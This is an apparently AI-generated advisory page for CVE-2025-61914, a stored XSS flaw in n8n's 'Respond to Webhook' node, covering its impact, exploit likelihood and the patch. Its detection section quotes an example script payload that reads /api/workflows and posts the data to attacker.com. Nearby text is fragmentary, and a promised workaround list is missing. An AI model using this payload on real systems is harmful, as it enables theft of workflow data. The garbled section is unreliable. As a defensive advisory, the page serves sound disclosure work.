
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-61914 is a stored Cross-Site Scripting (XSS) vulnerability in n8n's "Respond to Webhook" node that allows authenticated users with workflow creation permissions to execute arbitrary JavaScript in the n8n editor interface. The flaw affects all n8n versions prior to 1.114.0 (npm package). It was discovered by researcher nlgbao1340, published on December 26, 2025, and patched in the same release cycle. The GitHub Advisory Database rates this as High severity with a CVSS v3.1 score of 7.3, while Feedly's estimate places it at 5.4 (Medium) (Github Advisory, n8n Security Advisory).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), where HTML content returned by the "Respond to Webhook" node is not properly sanitized before rendering. A sandbox mechanism was introduced in n8n v1.103.0 to isolate webhook responses within an iframe, but the vulnerability allows script payloads to escape this sandbox and execute directly in the top-level browser window — within the authenticated n8n editor context. Exploitation requires the attacker to have workflow creation permissions and requires a victim user to interact with the crafted webhook response (e.g., by previewing or triggering the workflow output). No public proof-of-concept code has been identified at this time (Github Advisory, n8n Security Advisory).
Successful exploitation enables an attacker to execute arbitrary JavaScript within the authenticated session of another n8n user, facilitating CSRF-like actions without requiring direct cookie theft (session cookies are HttpOnly). Concrete impacts include unauthorized reading of sensitive workflow data and execution history, unauthorized modification or deletion of workflows, and insertion of malicious workflow logic or external data exfiltration steps. n8n instances that permit untrusted users to create workflows are most at risk, as a low-privileged attacker can target higher-privileged users such as administrators (Github Advisory).
No known in-the-wild exploitation or weaponized exploit kits have been reported for CVE-2025-61914. The EPSS score is approximately 0.008% (1st percentile), indicating a low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires low privileges (workflow creation access) and user interaction, limiting opportunistic mass exploitation but making it relevant in multi-tenant or shared n8n deployments (Github Advisory).
<script>fetch('/api/workflows').then(r=>r.json()).then(d=>fetch('https://attacker.com/exfil',{method:'POST',body:JSON.stringify(d)}))</script>).Content-Type: text/html containing <script> tags; unusual API calls to /api/workflows or /api/executions endpoints immediately following webhook response rendering.<script> tags or obfuscated JavaScript; unexpected changes to existing workflow logic (e.g., added HTTP Request nodes pointing to external URLs).The vulnerability is patched in n8n v1.114.0 — upgrading to this version or later is the primary recommended remediation (Github Advisory). For organizations unable to upgrade immediately, the following workarounds apply:
The advisory was published by n8n maintainer csuermann on December 26, 2025, and credited researcher nlgbao1340 for the discovery. The vulnerability was referenced in a CISA weekly vulnerability bulletin (week of December 22, 2025) and picked up by several security aggregators including Tenable, Red Hat CVE tracking, and INCIBE-CERT. No significant independent researcher commentary or social media discussion beyond automated CVE feeds has been identified (Github Advisory, CISA Bulletin).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."